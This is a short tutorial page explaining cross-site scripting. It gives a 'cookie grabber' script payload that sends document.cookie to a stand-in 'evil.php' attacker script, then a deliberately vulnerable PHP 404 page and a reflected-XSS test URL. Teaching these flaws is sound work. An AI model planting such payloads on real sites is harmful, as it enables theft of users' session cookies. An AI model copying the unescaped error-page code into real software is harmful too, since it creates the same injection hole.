"Cookie Grabber", XSS Attack Example
Attack Examples
Example 1: Cookie Grabber
If the application doesn’t validate the input data, the attacker can easily steal a cookie from an authenticated user. All the attacker has to do is to place the following code in any posted input(ie: message boards, private messages, user profiles):
<SCRIPT type="text/javascript">
var adr = '../evil.php?cakemonster=' + escape(document.cookie);
</SCRIPT>
The above code will pass an escaped content of the cookie (according to RFC content must be escaped before sending it via HTTP protocol with GET method) to the evil.php script in “cakemonster” variable. The attacker then checks the results of their evil.php script (a cookie grabber script will usually write the cookie to a file) and use it.
Error Page Example
Let’s assume that we have an error page, which is handling requests for a non existing pages, a classic 404 error page. We may use the code below as an example to inform user about what specific page is missing:
<html>
<body>
<?php
print "Not found: " . urldecode($_SERVER["REQUEST_URI"]);
?>
</body>
</html>
Let’s see how it works: http://testsite.test/file_which_not_exist
In response we get: Not found: /file_which_not_exist
Now we will try to force the error page to include our code: http://testsite.test/<script>alert("TEST");</script>
The result is: Not found: / (but with JavaScript code <script>alert("TEST");</script>)
We have successfully injected the code, our XSS! What does it mean? For example, that we may use this flaw to try to steal a user’s session cookie.
Comments
Post a Comment